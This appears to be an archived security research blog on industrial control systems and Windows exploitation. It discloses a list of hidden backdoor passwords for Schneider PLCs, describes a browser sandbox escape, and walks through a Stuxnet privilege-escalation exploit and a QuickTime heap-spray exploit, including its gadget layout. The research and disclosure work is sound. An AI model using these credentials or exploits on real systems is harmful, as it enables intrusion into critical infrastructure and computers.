ROM:20044884 BL _ZN11ModbusFC12517process125CommandEP7MBAPMSG ; ModbusFC125::process125Command(MBAPMSG ) ROM:20044888 B loc_20044860 ROM:20044888 ; End of function ModbusFC125::processModbusMessage(MBAPMSG ,int ) ROM:20044888 Just an example, to inject our own code we could use external modules. In fact this is how the webserver is implemented, as a separate module loaded at runtime: 'webserver.out' ; Attributes: bp-based frame ROM:200BA7BC ROM:200BA7BC http_init ; CODE XREF: HttpTask:loc_200BA9B8p ROM:200BA7BC ROM:200BA7BC var_50 = - 0x50 ROM:200BA7BC var_4C = - 0x4C ROM:200BA7BC var_48 = - 0x48 ROM:200BA7BC var_44 = - 0x44 ROM:200BA7BC var_40 = - 0x40 ROM:200BA7BC var_3C = - 0x3C ROM:200BA7BC var_38 = - 0x38 ROM:200BA7BC var_34 = - 0x34 ROM:200BA7BC var_30 = - 0x30 ROM:200BA7BC var_2C = - 0x2C ROM:200BA7BC var_28 = - 0x28 ROM:200BA7BC var_24 = - 0x24 ROM:200BA7BC var_1D = - 0x1D ROM:200BA7BC ROM:200BA7BC MOV R12, SP ROM:200BA7C0 STMFD SP!, {R4-R7,R11,R12,LR,PC} ROM:200BA7C4 SUB R11, R12, # 4 ROM:200BA7C8 LDR R6, = 0x203804F8 ROM:200BA7CC SUB SP, SP, # 0x34 ROM:200BA7D0 LDR R3, [R6] ROM:200BA7D4 ANDS R5, R3, # 1 ROM:200BA7D8 BEQ loc_200BA7E4 ROM:200BA7DC ROM:200BA7DC loc_200BA7DC ; CODE XREF: http_init+104j ROM:200BA7DC ; http_init+124j ... ROM:200BA7DC SUB SP, R11, # 0x1C ROM:200BA7E0 LDMFD SP, {R4-R7,R11,SP,PC} ROM:200BA7E4 ; --------------------------------------------------------------------------- ROM:200BA7E4 ROM:200BA7E4 loc_200BA7E4 ; CODE XREF: http_init+1Cj ROM:200BA7E4 LDR R1, =aSdcaWeb_0 ; "/SDCA/Web/" ROM:200BA7E8 LDR R0, = 0x203C5970 ROM:200BA7EC BL strcpy ROM:200BA7F0 LDR R0, = HttpServerFile ; "/SDCA/Firmware/WebServer.out" ROM:200BA7F4 MOV R1, R5 ROM:200BA7F8 MOV R2, R5 ROM:200BA7FC BL open ROM:200BA800 CMN R0, # 1 ROM:200BA804 MOV R4, R0 ROM:200BA808 BEQ loc_200BA8E4 ROM:200BA80C MOV R1, # 0xC ROM:200BA810 BL loadModule ROM:200BA814 CMP R0, # 0 ROM:200BA818 BEQ loc_200BA8C4 ROM:200BA81C LDR R7, = 0x203945EC ROM:200BA820 MOV R0, R4 ROM:200BA824 BL close ROM:200BA828 LDR R0, [R7] ROM:200BA82C LDR R1, = HttpServerEntry ; "websvxmain" ROM:200BA830 SUB R2, R11, #- var_24 ROM:200BA834 SUB R3, R11, #- var_1D ROM:200BA838 BL symFindByName ROM:200BA83C CMN R0, # 1 ROM:200BA840 BEQ loc_200BA904 ROM:200BA844 LDR R3, = HttpServerPrio ROM:200BA848 LDR R2, = HttpServerStack ROM:200BA84C LDR R12, [R11,# var_24 ] ROM:200BA850 LDR R1, [R3] ROM:200BA854 LDR R0, =aThttpd ; "tHttpd" ROM:200BA858 LDR R3, [R2] ROM:200BA85C MOV R2, R5 ROM:200BA860 STR R12, [SP,# 0x50 + var_50 ] ROM:200BA864 LDR R4, = 0x203804FC ROM:200BA868 STR R5, [SP,# 0x50 + var_4C ] ROM:200BA86C STR R5, [SP,# 0x50 + var_48 ] ROM:200BA870 STR R5, [SP,# 0x50 + var_44 ] ROM:200BA874 STR R5, [SP,# 0x50 + var_40 ] ROM:200BA878 STR R5, [SP,# 0x50 + var_3C ] ROM:200BA87C STR R5, [SP,# 0x50 + var_38 ] ROM:200BA880 STR R5, [SP,# 0x50 + var_34 ] ROM:200BA884 STR R5, [SP,# 0x50 + var_30 ] ROM:200BA888 STR R5, [SP,# 0x50 + var_2C ] ROM:200BA88C STR R5, [SP,# 0x50 + var_28 ] ROM:200BA890 BL taskSpawn So, why do all those hidden accounts exist? A good question. -Generating a password by deriving it from the MAC address makes sense as a method to gain access even if the original password has been lost. Technically, these accounts are backdoors though. -Most of them are used by configuration/(internal?)support software. For example, the hidden account 'loader:fwdownload' can be found inside Unity Loader. -In fact we can find more hidden accounts by reversing this kind of software. i.e Hidden account for Schneider Advantys STB devices by reversing the software used to upgrade the firmware. Schneider Advantys STB modules - nip2311_upgrade_[fw]_v3.01.00_[web]_v2.01.00.exe .text:00403579 .text:00403579 loc_403579: ; CODE XREF: sub_403546+22j .text:00403579 cmp dword_4134EC, 1 .text:00403580 jnz short loc_4035A7 .text:00403582 push dword ptr [edi] ; int .text:00403584 push offset aFcsdfcsd ; "fcsdfcsd" .text:00403589 push offset aNip2212 ; "nip2212" .text:0040358E call _FtpLogin .text:00403593 add esp, 0Ch .text:00403596 mov ebx, eax .text:00403598 test eax, eax .text:0040359A jnz loc_403623 .text:004035A0 mov esi, 1 .text:004035A5 jmp short loc_403623 .text:004035A7 ; --------------------------------------------------------------------------- .text:004035A7 .text:004035A7 loc_4035A7: ; CODE XREF: sub_403546+3Aj .text:004035A7 cmp dword_4134E4, 1 .text:004035AE jnz short loc_4035D1 .text:004035B0 push dword ptr [edi] ; int .text:004035B2 push offset aQwertyqwerty ; "qwertyqwerty" .text:004035B7 push (offset a00kernel0011ex+ 0AAh ) ; s .text:004035BC call _FtpLogin .text:004035C1 add esp, 0Ch .text:004035C4 mov ebx, eax .text:004035C6 test eax, eax .text:004035C8 jnz short loc_403623 .text:004035CA mov esi, 1 .text:004035CF jmp short loc_403623 .text:004035D1 ; --------------------------------------------------------------------------- .text:004035D1 .text:004035D1 loc_4035D1: ; CODE XREF: sub_403546+68j .text:004035D1 cmp dword_4134E8, 1 .text:004035D8 jnz short loc_4035FB .text:004035DA push dword ptr [edi] ; int .text:004035DC push offset aPoiuypoiuy ; "poiuypoiuy" .text:004035E1 push offset aNic2212 ; "nic2212" .text:004035E6 call _FtpLogin .text:004035EB add esp, 0Ch .text:004035EE mov ebx, eax .text:004035F0 test eax, eax .text:004035F2 jnz short loc_403623 .text:004035F4 mov esi, 1 .text:004035F9 jmp short loc_403623 .text:004035FB ; --------------------------------------------------------------------------- .text:004035FB .text:004035FB loc_4035FB: ; CODE XREF: sub_403546+92j .text:004035FB cmp dword_4134F0, 1 .text:00403602 jnz short loc_403623 .text:00403604 push dword ptr [edi] ; int .text:00403606 push offset aPcfactory ; "pcfactory" .text:0040360B push offset aPcfactory_0 ; "pcfactory" .text:00403610 call _FtpLogin .text:00403615 add esp, 0Ch .text:00403618 mov ebx, eax .text:0040361A test eax, eax .text:0040361C jnz short loc_403623 .text:0040361E mov esi, 1 Well, enough. We could be writing long time about all the interesting things you can find inside one of these firmwares but hey! now you have all the needed info to do so :) Summing up - In order to fully understand the PLC/Eth module, backplane and other protocols (i.e Unity's UMAS) we can reverse engineer the firmware, the java classes and vendor's software like Unity Loader. - You can remotely compromise Modicon PLCs exposed via NOE Ethernet modules through ftp, telnet, modbus, WDB, snmp, web... by using the backdoor credentials exposed or even without using them. - You can load your own trojanized firmware. - There are undocumented hidden accounts that can be used to compromise a PLC. - There are undocumented functionalities with security implications. - There is no solution other than redesigning these devices, which obviously is not feasible in the short/middle term so mitigations are needed and expected. - There is no patch available at this moment. Products affected: http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-346-01.pdf Backdoor accounts compilation pcfactory:pcfactory (hidden) loader:fwdownload (hidden) ntpupdate:ntpupdate (documented) sysdiag:factorycast@schneider (documented) test:testingpw (hidden) USER:USER (documented) USER:USERUSER (documented -not hidden-) (thanks to Stephan Beirer for pointing it out) webserver:webpages (hidden) fdrusers:sresurdf (hidden) nic2212:poiuypoiuy (hidden) nimrohs2212:qwertyqwerty (hidden) nip2212:fcsdfcsd (hidden) ftpuser:ftpuser (hidden) noe77111_v500:RcSyyebczS (hidden) (password hashed) AUTCSE:RybQRceeSd (hidden) (password hashed) AUT_CSE:cQdd9debez (hidden) (password hashed) target:RcQbRbzRyc (hidden) (password hasshed) Despite I'm releasing this information when there is still no patch available, It has been my decission. I reported it to the ICS-CERT months ago, I would like to thank the ICS-CERT and the Schneider security team, they have taken these issues very seriously and are working on a patch. During the process they have been keeping me updated on every decision/progress. However, some time ago I decided to change my disclosure policy. I would like to mention that other security researchers I talked to about this issue had found these hidden account as well, so kudos to K. Reid Wightman @ReverseICS and Jaime Blasco @jaimeblascob . Welcome to the 90s.

The power of reading: The CERN case.
(Thursday, 18 August 2011) Written by Rubén
First of all my respect and admiration to the people working at CERN and to scientists in general. Humanity has evolved thanks to minds like theirs. I guess we all would agree that the most useful advice commonly received, or given, in this sector is: read, read everything that you can, and more...and that's how this story begins. Some time ago, I spent a few hours compiling all the documentation/software I could find about UNICOS (Unified Industrial Control System ), which is the SCADA system of the CERN's Large Hadron Collider. Finally I managed to grab +2 GB of related stuff. Yes, there are quite a few information and software available, it's the good thing about the academic world, on the other side some of that information shouldn't be publicly available. This is a problem inherent to the academia: a lot of people accessing a lot of systems from a lot of places. A security nightmare for network administrators. I.e Did you ever try to navigate public AFS folders? oh boy... So days after, I spent quite a few hours reading all that documentation, taking a look at the software... trying to understand how things were working at the LHC. I had found out several sources of info but above all I downloaded a huge amount of docs from a specific website; while reading them I realized that these were not intended for the 'public consumption'. Internal Proceedings, info about PLCs, profibus network, IPs...and a couple of user/password accounts. Redacted The document where this account was mentioned looked so much interesting that I had to test whether these accounts were valid or not. https://winservices.web.cern.ch/winservices/Help/Contents/Files/TerminalServices/TerminalServicesUsing.pdf One account was not active, but the other one...landed! Then I installed metasploit and through a lateral movement I gained access to the LHC Control System, I covertly replaced beams with beans so instead of protons, during a whole week the LHC was detecting the collisions produced in a traditional english breakfast. Just kidding...Once I verified the credentials were valid I contacted ICS-CERT warning about this scenario, where a potential attacker could end up accessing LHC's control systems (better said, one of them). In a really short period, the credentials were removed, even from google cache, so thanks to those involved. The official response from CERN was the following : * The documents have been removed from that public web site. * The documents have been requested to be purged from Google cache, and subsequently removed by Google. * One password was valid, the second outdated since long. The valid password has been changed on all instances. * We have checked our web logs and did not find any suspicious accesses to those documents. Due to our defence-in-depth approach, direct access was and would have been impossible to that particular system. Local access would have been needed. Well, I cannot say that accessing that system may be possible, however within our sector 'impossible' is a risky word. Take a look at these publicly available documents : + http://alicedcs.web.cern.ch/AliceDCS/Documents/terminal%20services.doc + http://indico.cern.ch/getFile.py/access?contribId=7&resId=0&materialId=slides&confId=13367 If this architecture is still active I wouldn't say "impossible" but rather difficult. Remember Stuxnet...and in regard to SmartCard 'local' security take a look at this great presentation from my fellow Gabriel Gonzalez http://www.gabrielgonzalezgarcia.com/2011/04/18/man-in-remote/ Please, note that you can even download PVSS projects at http://j2eeps.cern.ch/wikis/display/EN/UNICOS-PVSS . Too much information available? maybe... Again, kudos to CERN staff, their research is awesome.

Reversing DELL's DRAC firmware
(Monday, 15 August 2011) Written by Rubén
Update #1 http://twitter.com/#!/reversemode/status/103372506869661696 Update #2 http://twitter.com/#!/reversemode/status/103386457707782144 pam_local_manager.so != pam_unix.so so /etc/shadow is not being used to authenticate users :( Hi, Firmware reversing is really interesting, better said not only interesting but mandatory when you are researching into SCADA devices. However, this time I'm going to explain how to discover vulnerabilities on embedded systems, without needing the device at all. In this case, our target is the latest version of DELL's out-of-band management system: iDRAC 6. When facing a new software / hardware, first of all is to find as much documentation as possible about the system. By reading Wikipedia's entry about DRAC we come across the most important references, moreover simple google searches show a lot of interesting results. Although the source code of certain components of DELL DRAC firmware are available, Dell does not provide neither the environment to create a functional firmware nor the code of a fully functional final version. Therefore, we do not have access to the more interesting part, reverse engineering comes into play. Let's see how far we can go. You can download the latest version from Dell's support page http://support.us.dell.com/support/downloads/format.aspx?releaseid=R299265&c=us&l=en&cs=&s=gen It's a self-extracting zip that unpacks two files, one of them is the firmware "firmimg.d6" (54mb). Now, we can start by using binwalk to see how many info it can extract. We can not blindly trust this program, based on signatures, since sometimes it returns false positives and/or results that make nonsense. Anyway, it's a good starting point. DECIMAL \| HEX \| DESCRIPTION -------------------------------------------------- ------------ 0x200 512 uImage header, created: Sat Mar 12 21:17:47 2011, image size: 4479904 bytes, Data Address: 0x8000, Entry Point: 0x8000, CRC: 0x1BB8BE08, OS: Linux CPU: ARM, image type: OS Kernel Image, compression type: none, image name: arm-linux 12424 0x3088 romfs filesystem, version 1 1,892,957,376 bytes, named \ 240 \ 324

Silent bug is silent.
(Wednesday, 10 August 2011) Written by Rubén
Hi there, During the last months, completed in this Patch Tuesday, Microsoft has 'abruptly' changed a policy that was working for years: http://blogs.msdn.com/b/ieinternals/archive/2011/03/09/internet-explorer-9-xbap-disabled-in-the-internet-zone.aspx I guess that XBAP apps were posing a risk level too high to get accepted. At the same price, they have silently fixed a blatant method to bypass IE protected mode I discovered long time ago...let me explain it briefly. There are 3 main integrity levels: low, medium, high. IE8/9 launches two differente process. -> Broker/Monitor (medium integrity) (parent) -> Browser (low integrity) (child) The low integrity instance is where those funny shellcodes are executed, so we should understand this flaw as the second stage within a client-side exploitation scenario. Therefore, a remote code execution is mandatory before taking advantage of this flaw. A common scenario would be the following: 1. Ban Ki-Moon visits a malicious U.N website where a RCE vulnerability is triggered within the context of the low integrity IE 2. Local exploit is executed to bypass IE Protected mode. 3. VLC playing Nyan Cat video is launched as a medium integrity process. But...How !? Microsoft introduced the concept of "broker processes" to let extensions, running inside the IE low integrity instance, perform operations that need higher privileges. These processes are registered through the following key: \HKEY_LOCAL_MACHINE SOFTWARE\Microsoft Internet Explorer\Low Rights\ElevationPolicy Thus, if a low integrity instance invokes one of these registered broker processes, the medium integrity instance will handle this request. Sometimes even without prompting the user. It depends on this policy: 0x3 = Protected Mode silently launches the broker as a medium integrity process PresentationHost.exe is registered as a broker process of type 3. Basically, this process takes care of WPF applications. Ok, so we can silently launch this process as a medium integrity process so far. However we still need another step, we should be able to take advantage of this feature to launch an arbitrary executable as a medium integrity process. Now comes the interesting part. There was (or even is) a design flaw on Windows Vista and 7, by reading the specs I noted an interesting behavior: WPF applications run inside the presentationhost's SandBox and its graphical output is rendered inside Internet Explorer. Cool. Game over.I love this flaw because reverse engineering is not involved as usual, all you need to do is reading documentation. I wonder how many people also discovered this flaw, sure I was not the only one. So taking into account XBAP applications loaded from the local file system ( even from LocalLow ;) ) were considered as a full-trust application (with no restrictions in terms of CAS), we could abuse this design flaw to execute an arbitrary .NET application as a medium integrity process, from our IE low integrity instance. Unfortunately the trick is no longer working since urlmon!CSecurityManager::MapToUrlZone, no matter the location of your XBAP app, will map it to the Internet Zone. This prevents XBAP apps from being loaded due to the new policy of URLACTION_WINDOWS_BROWSER_APPLICATIONS is 'Disabled' by default. References I used to discover this bug Understanding and Working in Protected Mode Internet Explorer http://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx Windows Presentation Foundation Security Sandbox http://msdn.microsoft.com/en-us/library/aa480229.aspx

Analyzing CVE-2010-4284 - Samsung Data Management Server SQLi
(Monday, 09 May 2011) Written by Rubén
Hi Several months ago the spanish security researcher ( ese wachi!! ;) ) José Antonio Guasch discovered a SQLi in the login panel of a Samsung HVAC device . Thus, an attacker successfully exploiting this flaw can bypass authentication and access the web server as an administrative user. Samsung, ICS-CERT and Jose Antonio were coordinating this issue and finally the advisory and the patch have been released. The first curious thing I came across while reading http://www.dvmcare.com/SRM/dms/HowToUpgradeDMSSW.pdf was the fact that in the whole document there was not a single line or picture explaining how to do authentication before updating the firmware. The reason is simple; you don't need to be authenticated at all. Let's analyze the updater http://www.dvmcare.com/SRM/dms/DMSUpdaterPlus.zip Using ILSpy It's pretty clear, isn't it? Root access for everybody through telnet and ftp BusyBox v1.00 (2005.03.22-03:58+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. ~ # help Built-in commands: ------------------- . : alias bg break cd chdir continue eval exec exit export false fg getopts hash help jobs kill let local pwd read readonly return set shift times trap true type ulimit umask unalias unset wait The patch that fixes the SQLi is the following piece of code you can find by decompressing the firmware and then taking a look at '\chiweb\LoginManager.class' public static boolean verifyUser(String id, String password) { CDBManager dbManager = null; ResultSet rs = null; boolean isValid = false; if ((id == null) \|\| (password == null)) return false; int index1 = id.indexOf(39); index2 = id.indexOf(61); int index3 = id.indexOf("--"); int index4 = id.indexOf(59); int index5 = id.indexOf(37); if ((index1 > = 0) \|\| (index2 > = 0) \|\| (index3 > = 0) \|\| (index4 > = 0) \|\| (index5 > = 0)) return false; index1 = password.indexOf(39); index2 = password.indexOf(61); index3 = password.indexOf("--"); index4 = password.indexOf(59); index5 = password.indexOf(37); if ((index1 > = 0) \|\| (index2 > = 0) \|\| (index3 > = 0) \|\| (index4 > = 0) \|\| (index5 > = 0)) return false; try { dbManager = new CDBManager(); String strQuery = "select id, description from UserList where id = '" + id + "' and pwd = '" + password + "'"; Game over. You should be disabling any external access to these devices right now http://eripp.com/?ipdb=1&search=samsung+data+management&sort=time&order=DESC&limit=200

Reverse engineering a SCADA hoax
(Monday, 18 April 2011) Written by Rubén
Well, before the snowball becomes bigger (too late I guess) I'll try to explain why I think the FPL hack is an hoax. Context: FD ... Let's analyze the email: Here comes my revenge for illegitimate firing from Florida Power & Light Company (FPL) ... ain't nothing you can do with it, since your electricity is turned off !!! D'Oh, not very original, disgruntled former engineer...if real, too many clues... Secure you SCADA better! Leaked files are attached ... 1) http://img838.imageshack.us/i/49986845.png/ Taking into account it claims he hacked a 200 MW /136 turbines wind farm, those 3945KW/135KWh make non sense for a large wind energy facility. Another weird thing is the "energie" button (energy in german language). Wind speed metered in m/s without mentioning mph is still possible so it's ok for me. 2) http://img838.imageshack.us/i/24380855.png/ 3) http://img24.imageshack.us/i/58868342.png/ Either you have WinCC or GIMP/Paint/Photshop you'll be able to create this creepy sinoptic. If you manage to convince me that a 200MW facility is controlled by this sinoptic, I'll kiss your shiny metal ass. Even the lines are malformed. The input voltage line for the sinamics s120 is used as feeder for 'whatever' those fans are representing . Absurd. Also note the custom messages in german...Everybody knows that at FPL german is the corporate language ¬¬ 4) http://img228.imageshack.us/i/85258364.png/ ftp://goxftp01.fpl.com/pub/oasis/ ...no comment 5) http://img163.imageshack.us/i/90736853.png/ 6) http://img217.imageshack.us/i/55439027.png/ 7) http://img40.imageshack.us/i/87526089.png/ 8) http://img864.imageshack.us/i/94061747.png/ Lifted from the following public document ftp://goxftp01.fpl.com/pub/oasis/switchyardreliability/switchyardreliability.pdf ...no comment 161.154.232.65 HTTP/1.0 401 Unauthorized Date: Sat, 05 Feb 2011 23:43:13 GMT Server: VTS 9.0.05 Content-Type: text/html Content-Length: 622 Cache-Control: no-cache WWW-Authenticate: Basic realm="Ft. Sumner SCADA" Cache-control: no-cache="set-cookie" Cache-control: private Set-Cookie: VTS=9.0005;Version=1;Path=/ Set-Cookie: SessionID=0;Version=1;Path=/Ft. Sumner SCADA/cc8620ba-ad1a-4ae9-96ed-036c22c3576a Set-Cookie: SessionID=0;Version=1;Path=/Ft%2e%20Sumner%20SCADA/cc8620ba-ad1a-4ae9-96ed-036c22c.. IP does not match the headers. Headers correspond to a computer running water-treatment HMI software developed by Trihedral. Server: VTS is the key.Some time ago I reported to ICS-CERT that dozens of facilities running this software could be accessed by using default password. People behind this hoax probably used this info to reinforce the hoax due to "WWW-Authenticate: Basic realm="Ft. Sumner SCADA" linking it to Fort Sumner, where this wind farm is located. Morever, according to public docs the wind farm operates 136 1.5 MW GE turbines, likely controlled by GE's hardware/software...WindControl,WindSCADA... The CISCO IOS config is not anything special... Conclusion: FAKE.

ASLR_Tricks--
(Saturday, 16 April 2011) Written by Rubén
Hi Latest patches killed one reliable and publicly known trick to bypass ASLR. Let's see how Microsoft implements this patch.First off we have to recall how the trick worked. DotNet user controls could be hosted,although sandboxed, in IE. Later on, after Dowd and Sotirov presented their talk at BlackHat the trick was restricted to higher security zones. However, IE was still loading mime handlers when detecting DotNet user controls, which involved loading the famous non-aslr mscorie.dll. Thus this single line would do the work.

SCADA Trojans: Attacking the Grid + 0dayZ!
(Tuesday, 22 March 2011) Written by Rubén
Hi! You can download the slides of the research I was presenting at RootedCon'11 in Madrid "SCADA Trojans: Attacking the grid". A journey into attacking the power grid. I presented: - 0days in Advantech/BroadWin WebAccess SCADA product - Weak Design/Vulnerabilities in CSE-Semaphore TBOX RTUs - General attack against EMS Software via State Estimators. I contacted ICS-CERT to coordinate with Advantech but the vendor denied having a security flaw. So guys, the exploit I'm releasing does not exist. All is product of your mind. Well, indeed WebAccess is full of bugs. It is an RPC exploit against WebAccess Network Service, port 4592. It leaks the security code that protects the scada node in addition to demonstrate RCE on XP. Slighly modifications can be done to support other systems. I use "RPC heap spray", I mean any opcode with the following params " [in] long arg_x, [in][ref][size_is(arg_x)] char * arg_x " can be used to create a fake object to control the execution. It could be done in other ways, but this one is funny. Check the slides, there is more info about the vulns there. Download Exploit source code Download Slides [PDF] "SCADA Trojans: Attacking the Grid" Bye!

Stuxnet MS10-073/CVE-2010-2743 Exploit
(Thursday, 13 January 2011) Written by Rubén
Hi everyone, To inaugurate 2011 I decided to release the exploit code for one of the EoP vulnerabilities exploited by Stuxnet. Stuxnet. What else could we say? It was the best gift of 2010. Stuxnet used this flaw to escalate privileges in XP/2K boxes. It's stored in the resource 250, xored, can you guess the key? ;) After performing several paranoid checks to avoid unsuccessful exploitation ( elaborated by VUPEN ), the party starts... The vulnerability has been already explained so just a couple of notes Resource250.dll .text:10001082 test si, si .text:10001085 jnz short loc_100010A9 .text:10001087 push [ebp+var_4] .text:1000108A lea eax, [ebp+var_44] .text:1000108D push eax .text:1000108E call GoGoGo ... .text:10002A48 lea eax, [ebp+var_218] .text:10002A4E push eax .text:10002A4F lea eax, [ebp+var_8] .text:10002A52 push eax .text:10002A53 push edi .text:10002A54 call CreateFakeKbdLayoutFile Stuxnet creates a temporary file and writes into it a minimalistic fake Keyboard Layout dll built up to be swallowed by win32k!ReadLayoutFile without problems. .text:10001FC6 loc_10001FC6: ; CODE XREF: CreateFakeKbdLayoutFile+CFj .text:10001FC6 push ebx .text:10001FC7 lea eax, [ebp+var_4] .text:10001FCA push eax .text:10001FCB push 246h .text:10001FD0 push offset unk_1000B058; fake Keyboard Layout Dll .text:10001FD5 push esi .text:10001FD6 call WriteFile Then it is ready to trigger the vuln and execute the shellcode .text:10002A63 push [ebp+var_8] .text:10002A66 push edi .text:10002A67 push esi .text:10002A68 push [ebp+arg_0] .text:10002A6B push [ebp+var_4] .text:10002A6E call TriggerVuln ... .text:100027F3 push 101h .text:100027F8 push [ebp+var_8] .text:100027FB push eax .text:100027FC push [ebp+var_4] .text:100027FF push 1AE0160h .text:10002804 push [ebp+arg_10] .text:10002807 call LoadFakeKBDviaNtUserLoadKeyboardLayoutEx Finally .text:10002839 push 1Ch .text:1000283B lea eax, [ebp+var_50] .text:1000283E push eax .text:1000283F push ebx .text:10002840 mov [edi+38h], esi .text:10002843 call SendInput At this point the shellcode is being executed. Everytime this code is executed God breaks something in Natanz. [+] Download ms10-073-stuxnet.zip

[0day] Apple QuickTime "_Marshaled_pUnk" backdoor param client-side arbitrary code execution
(Monday, 30 August 2010) Written by Rubén
Hi there, Today we're going to talk about an interesting "backdoor" I uncovered during a static reversing session against QTPlugin.ocx. WATCH OUT! Do not hype this issue beyond it deserves. This time Backdoor != malicious code but a horrible trick a developer implemented during the development cycle.These hacks could end up having a harmful impact. The scenario would be as follows: Victim prerequisites: * Internet Explorer. * XP,Vista,W7. * Apple Quicktime 7.x, 6.x ( 2004 versions are also vulnerable, older versions not checked ) 1. Victim is enticed into visiting, by any mean, a specially crafted webpage. 2. Attacker's payload to be executed under the context of the browser. 3. Attacker calls his girlfriend to inform about the successful exploitation, who indeed turns out to be very interested in the issue. She demands more technical details. 4. Attacker wakes up. Technical details QTPlugin.ocx implements IPersistPropertyBag2::Read (1000E330) to handle params received from where it is embedded, including HTML documents. Let's take a look .text:1000E330 .text:1000E330 ; =============== S U B R O U T I N E ======================================= .text:1000E330 .text:1000E330 .text:1000E330 sub_1000E330 proc near ; DATA XREF: .rdata:1002E0ECo .text:1000E330 ; .rdata:1002E86Co .text:1000E330 .text:1000E330 arg_0 = dword ptr 4 .text:1000E330 arg_4 = dword ptr 8 .text:1000E330 arg_8 = dword ptr 0Ch .text:1000E330 .text:1000E330 push esi .text:1000E331 mov esi, [esp+ 4 + arg_0 ] .text:1000E335 mov ecx, [esi+ 84h ] .text:1000E33B xor eax, eax .text:1000E33D test ecx, ecx .text:1000E33F jz short loc_1000E393 .text:1000E341 mov eax, [esp+ 4 + arg_8 ] .text:1000E345 mov edx, [esp+ 4 + arg_4 ] .text:1000E349 push eax .text:1000E34A push edx .text:1000E34B call sub_100031F0 Following the flow... sub_10002980+27A sub_10002980+27A loc_10002BFA: ; CODE XREF: sub_10002980+266j sub_10002980+27A ; sub_10002980+272j sub_10002980+27A push offset aType ; "type" sub_10002980+27F push ebx ; lpString1 sub_10002980+280 call ebp ; lstrcmpiA sub_10002980+282 test eax, eax sub_10002980+284 jnz short loc_10002C22 sub_10002980+286 push edi ; lpString sub_10002980+287 call ds: lstrlenA sub_10002980+28D cmp eax, 104h sub_10002980+292 jnb short loc_10002C22 sub_10002980+294 push edi ; lpString2 sub_10002980+295 lea edx, [esi+ 83Ch ] sub_10002980+29B push edx ; lpString1 sub_10002980+29C call ds: lstrcpyA sub_10002980+2A2 sub_10002980+2A2 loc_10002C22: ; CODE XREF: sub_10002980+284j sub_10002980+2A2 ; sub_10002980+292j sub_10002980+2A2 push offset a_marshaled_pun ; "_Marshaled_pUnk" sub_10002980+2A7 push ebx ; lpString1 sub_10002980+2A8 call ebp ; lstrcmpiA sub_10002980+2AA test eax, eax sub_10002980+2AC jnz short loc_10002C4A sub_10002980+2AE push edi sub_10002980+2AF call sub_10001310 ; SIMPLE ASCII NUMBERS TO LONG routine sub_10002980+2B4 add esp, 4 sub_10002980+2B7 lea ecx, [esi+ 13B8h ] sub_10002980+2BD push ecx ; ppv sub_10002980+2BE push offset iid ; iid sub_10002980+2C3 push eax ; pStm sub_10002980+2C4 call ds: CoGetInterfaceAndReleaseStream ; WE HAVE A WINNER!! sub_10002980+2CA sub_10002980+2CA loc_10002C4A: ; CODE XREF: sub_10002980+2ACj sub_10002980+2CA push edi ; int Oops! programming rules state that hidden properties should be preceded by "_" so this property matches the requirement. It's time to google "_Marshaled_pUnk" which brings us 0 results. Apple scripting guide for Quicktime does not even mention it. Weird. What's is going on here? QTPlugin.OCX checks for the existence of "_Marshaled_pUnk" within object's attributes, if so, unmarshals it by converting the address from its ascii representation into a numerical one ( sub_10001310 ). Then, it uses the resulting pointer as pStm ,"A pointer to the IStream interface on the stream to be unmarshaled", CoGetInterfaceAndReleaseStream in order to obtain the IUnknown pointer (pUnk from now on) of the marshalled interface. This method is pretty common for sharing interface pointers between threads within COM enabled scenarios ( e.g browsers + plugins ). So we are controlling an IStream pointer, which is good :) However at this point the things didn't make sense for me. Despite of the fact that a CPluginHost object's variable holds this pointer (pPlugin+0x13b8), pUnk is never used,. According to the COM model, this pointer shouldn't be used by any other thread. Why in the hell an apple engineer implemented this? A conspiration between NSA, FSB and the bloody Andorra 's secret service may be possible but I think there must be another explanation. Back to the future So I am downloading an older version of QTPlugin.ocx, which dates from 2004 (6.5.1.17), to try to explain an issue in 2010, cool. Module: QTPlugin.ocx .text:6670BE86 mov eax, [ebp+ 1480h ; pPlugin-> pUnk ] .text:6670BE8C cmp eax, edi .text:6670BE8E jz short loc_6670BEF7 .text:6670BE90 lea edx, [esp+ 7Ch + pHandles ] .text:6670BE97 mov [esp+ 7Ch + pHandles ], edi .text:6670BE9E mov ecx, [eax] .text:6670BEA0 push edx .text:6670BEA1 push offset dword_667214C8 ; IID_IViewObject .text:6670BEA6 push eax .text:6670BEA7 call dword ptr [ecx] ; pUnk-> QueryInterface(IID_IViewObject,pView) .text:6670BEA9 test eax, eax .text:6670BEAB jl short loc_6670BEF7 .text:6670BEAD mov edx, [esp+ 7Ch + arg_10 ] .text:6670BEB4 push edi .text:6670BEB5 push edi .text:6670BEB6 mov eax, [esp+ 84h + pHandles ] .text:6670BEBD push edx .text:6670BEBE mov edx, [esp+ 88h + arg_C ] .text:6670BEC5 mov ecx, [eax] .text:6670BEC7 push edx .text:6670BEC8 mov edx, [esp+ 8Ch + hdc ] .text:6670BECF push edx .text:6670BED0 mov edx, [esp+ 90h + arg_4 ] .text:6670BED7 push esi .text:6670BED8 push edi .text:6670BED9 push edi .text:6670BEDA push 0FFFFFFFFh .text:6670BEDC push edx .text:6670BEDD push eax .text:6670BEDE call dword ptr [ecx+ 0Ch ] ; pView-> Draw(...) Reversing this function we can see that, in certain cases, QTPlugin.ocx could be instructed to draw contents onto an existing window instead of creating a new one. Mistery solved. However, although this functionality was removed in newer versions, the param is still present. Why? I guess someone forgot to clean up the code . Exploiting it We are controlling the IStream Pointer passed to CoGetInterfaceAndReleaseStream, at a certain point during the execution flow of this function, an IStream method is going to be referenced. ole32!wCoGetInterfaceAndReleaseStream -> ole32!CoUnmarshalInterface -> ole32!ReadObjRef -> ole32!StRead < = p0wn!! So all we need to do is emulate a fake IStream interface in memory. How? aligned heap spray FTW! This is how our sprayed block would look in memory Heap Value 15220c20 15220c18 // Fake VTable pointer 15220c24 29527ae7 // gadget1 WindowsLiveLogin 15220c28 27582d63 // gadget2 msidcrl40.dll 15220c2c 15220d08 // pParam for LoadLibrary (DLL UNC PATH ) 15220c30 15220cbc // -add ecx, 0A0h, mov eax, [ecx]...- gadget2 15220c34 15220cbc 15220c38 15220cbc 15220c3c 15220cbc 15220c40 15220cbc 15220c44 15220cbc 15220c48 15220cbc 15220c4c 15220cbc 15220c50 15220cbc 15220c54 15220cbc 15220c58 15220cbc 15220c5c 